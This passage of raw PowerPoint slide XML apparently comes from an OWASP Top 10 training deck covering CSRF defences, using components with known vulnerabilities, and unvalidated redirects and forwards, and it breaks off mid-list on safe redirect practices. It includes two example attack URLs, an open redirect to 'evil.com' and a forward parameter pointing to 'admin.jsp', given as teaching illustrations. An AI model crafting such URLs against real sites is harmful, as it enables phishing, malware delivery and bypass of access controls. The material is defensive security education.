                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>CSRF Guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can automatically include such tokens in Java EE, .NET, or PHP apps. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> includes methods developers can use to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requiring the user to reauthenticate, or prove they are a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user (e.g., via a CAPTCHA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can also protect against CSRF.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(CSRF)</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A8</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020456833"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="255347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DIFFICULT</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6956">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Some</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> v</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> components (e.g., framework libraries) can be identified and exploited with automated tools, expanding the threat agent pool beyond targeted attackers to include chaotic actors.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 identifies a weak component through scanning or manual analysis. He customizes the exploit as needed and executes the attack. It gets more difficult if the used component is deep in the application.</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Virtually</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> every application has these issues because most development teams don’t focus on ensuring their components/libraries are up to date. In many cases,  the developers don’t even know all the components they are using, never mind their versions. Component dependencies make things even worse.</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> full range of weaknesses is possible, including injection, broken access control, XSS, etc. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The impact could range from minimal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> to complete host takeover and data compromise.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what each vulnerability might mean for the business controlled by the affected application. It could be trivial or it could mean complete compromise.</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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Component vulnerabilities can cause almost any type of risk imaginable, ranging from the trivial to sophisticated malware designed to target a specific organization. Components almost always run with the full privilege of the application, so flaws in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> component can be serious, The following two vulnerable components were downloaded 22m times in 2011.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Apache CXF Authentication Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ervices framework, not to be confused with the Apache Application Server.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Spring Remote Code Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Abuse of the Expression Language implementation in Spring allowed attackers to execute arbitrary code, effectively taking over the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Every application using either of these vulnerable libraries is vulnerable to attack as both of these components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit.</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Known Vulns?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In theory, it ought to be easy to figure out if you are currently using any vulnerable components or libraries. Unfortunately, vulnerability reports for commercial or open source software do not always specify exactly which versions of a component are vulnerable in a standard, searchable way. Further, not all libraries use an understandable version numbering system. Worst of all, not all vulnerabilities are reported to a central clearinghouse that is easy to search, although sites like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are becoming easier to search.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. If one of your components does have a vulnerability, you should carefully evaluate whether you are actually vulnerable by checking to see if your code uses the part of the component with the vulnerability and whether the flaw could result in an impact you care about.</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8"/>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9"/>
              </a:rPr>
              <a:t>OWASP Dependency Check (for Java libraries)</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0"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>SafeNuGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> (for .NET libraries thru </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>NuGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>)</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1"/>
              </a:rPr>
              <a:t>Good Component Practices Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="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8"/>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12"/>
              </a:rPr>
              <a:t>The Unfortunate Reality of Insecure Libraries</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3"/>
              </a:rPr>
              <a:t>Open Source Software Security</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4"/>
              </a:rPr>
              <a:t>Addressing Security Concerns in Open Source Components</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6"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures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5"/>
              </a:rPr>
              <a:t>Example Mass Assignment Vulnerability that was fixed in ActiveRecord, a Ruby on Rails GEM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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One option is not to use components that you didn’t write. But that’s not very realistic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most component projects do not create vulnerability patches for old versions. Instead, most simply fix the problem in the next version. So upgrading to these new versions is critical.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software projects should have a process in place to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify all components and the versions you are using, including all dependencies. (e.g., the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> plugin).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up to date.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Establish security policies governing component use, such as requiring certain software development practices, passing security tests, and acceptable licenses. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where appropriate, consider adding security wrappers around components to disable unused functionality and/ or secure weak or vulnerable aspects of the component.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using Components with Known Vulnerabilities</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A9</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65457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0062019"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948521"/>
          <a:ext cx="6858000" cy="2536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82446">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51035">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trick your users into submitting a request to your website. Any website or other HTML feed that your users use could do this.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 links to unvalidated redirect and tricks victims into clicking it. Victims are more likely to click on it, since the link is to a valid site. Attacker targets unsafe forward to bypass security checks.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Applications frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecting unchecked redirects is easy. Look for redirects where you can set the full URL. Unchecked forwards are harder, because they target internal pages.</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Such redirects may</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.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retaining</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>your users’ trust</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.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What if they get owned by malware?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What if attackers can access internal only functions?</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The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/redirect.jsp?url=evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </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The application uses forwards to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forwards the attacker to administrative functionality for which the attacker isn’t authorized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/boring.jsp?fwd=admin.jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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Redirection?</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has any unvalidated redirects or forwards is to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review the code for all uses of redirect or forward (called a transfer in .NET). For each use, identify if the target URL is included in any parameter values. If so, if the target URL isn’t validated against a whitelist, you are vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Also, spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If code is unavailable, check all parameters to see if they look like part of a redirect or forward URL destination and test those that do.</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Article on Open Redirects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ESAPI SecurityWrapperResponse sendRedirect() method</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng"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7"/>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CWE Entry 601 on Open Redirects </a:t>
            </a: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WASC Article on URL Redirector Abuse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Google blog article on the dangers of open redirects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1"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Top 10 for .NET article on Unvalidated Redirects and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Safe use of redirects and forwards can be done in a number of ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
